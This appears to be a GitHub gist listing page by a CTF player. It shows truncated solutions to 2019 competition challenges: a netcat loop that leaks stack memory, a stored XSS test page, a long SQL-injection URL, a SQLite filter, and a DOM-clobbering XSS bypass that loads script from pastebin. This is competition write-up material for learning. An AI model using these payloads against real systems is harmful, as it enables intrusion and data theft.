terjanq
#!/usr/bin/env python2
# encoding: utf-8
from pwn import *
from Crypto.Util.number import long_to_bytes, inverse

# Chinese Remainder Theorem: combine residues a[i] mod n[i] for pairwise coprime moduli n
def chinese_remainder(n, a):
    sum = 0
    prod = reduce(lambda a, b: a*b, n)
    for n_i, a_i in zip(n, a):
        p = prod // n_i
        sum += a_i * inverse(p, n_i) * p
    return sum % prod
@terjanq
terjanq / soluton_quotes.sh
Last active April 15, 2019 10:54
Solution for Potent Quotes #pctf2019
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it
# In terminal 1 run (leaking the stack to the file, looking for the Location: header):
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
| nc quotables.pwni.ng 1337 -q 1 >> aaa &; done; sleep 1; done
@terjanq
terjanq / test_post.html
Created April 25, 2019 12:37
DOM Validator - angstrom CTF 2019
<!DOCTYPE html SYSTEM "3b16c602b53a3e4fc22f0d25cddb0fc4d1478e0233c83172c36d0a6cf46c171ed5811fbffc3cb9c3705b7258179ef11362760d105fb483937607dd46a6abcffc">
<html>
<head>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/sha512.js"></script>
<script src="../scripts/DOMValidator.js"></script>
</head>
<body>
<h1>test_post</h1>
<p><script>alert('pwned')</script></p>
@terjanq
terjanq / DOMValidator.js
Created April 25, 2019 12:41
DOM Validator - angstrom CTF 2019
function checksum (element) {
var string = ''
string += (element.attributes ? element.attributes.length : 0) + '|'
for (var i = 0; i < (element.attributes ? element.attributes.length : 0); i++) {
string += element.attributes[i].name + ':' + element.attributes[i].value + '|'
}
string += (element.childNodes ? element.childNodes.length : 0) + '|'
for (var i = 0; i < (element.childNodes ? element.childNodes.length : 0); i++) {
string += checksum(element.childNodes[i]) + '|'
}
@terjanq
terjanq / harekaze19_solutions.md
Last active August 9, 2019 18:55
Harekaze 2019 writeups by terjanq (https://twitter.com/terjanq)

SQLite Voting

function is_valid($str) {
  $banword = [
    // dangerous chars
    // " % ' * + / < = > \ _ ` ~ -
    "[\"%'*+\\/<=>\\\\_`~-]",
 // whitespace chars
@terjanq
terjanq / request.txt
Created June 30, 2019 16:42
gLotto solution #gctf2019 Google CTF
https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@
@terjanq
terjanq / full_challenge.html
Created September 23, 2019 14:55
XSS Challenge DOM Clobbering
<!doctype html><meta charset=utf-8>
<title>SecurityMB's Security Challenge</title>
<style>
* {
font-family: monospace;
}
textarea {
width:100%;
height:90px;
const sanitized = DOMPurify.sanitize(input.value);
const html = `
<meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/">
<h1>Homepage!</h1>
<p>Welcome to my homepage! Here are some info about me:</p>
${sanitized}
<script nonce=xyz src="./main.js"><\/script>
`;
@terjanq
terjanq / main.js
Created September 23, 2019 15:08
XSS Challenge DOM Clobbering
window.CONFIG = window.CONFIG || {
version: "v20190816",
test: false,
appName: "XSS Challenge",
}
function loadModule(moduleName) {
const scriptSrc = new URL(document.currentScript.src);
let url = '';
@terjanq
terjanq / straight-forward-solution.html
Last active September 23, 2019 15:45
XSS Challenge DOM Clobbering
<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>